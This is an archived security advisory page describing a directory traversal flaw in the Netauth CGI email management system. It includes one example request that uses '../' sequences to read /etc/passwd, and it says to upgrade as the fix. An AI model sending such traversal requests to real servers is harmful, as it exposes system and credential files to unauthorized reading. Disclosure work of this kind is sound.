Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: netauth1.htm

Netauth CGI Directory traversal vulnerability



Vulnerability

    Netauth

Affected

    Netauth

Description

    Marc  Maiffret  found  following.   Netauth  is  a web based eMail
    management system for  Windows NT and  most Unix platforms.   What
    is the hole?  The nethauth.cgi file

        http://[server]/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd

Solution

    The Netauth  developers (very  cool guys)  fixed this  whole a few
    months back.  So just go to their website and download the  latest
    version.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH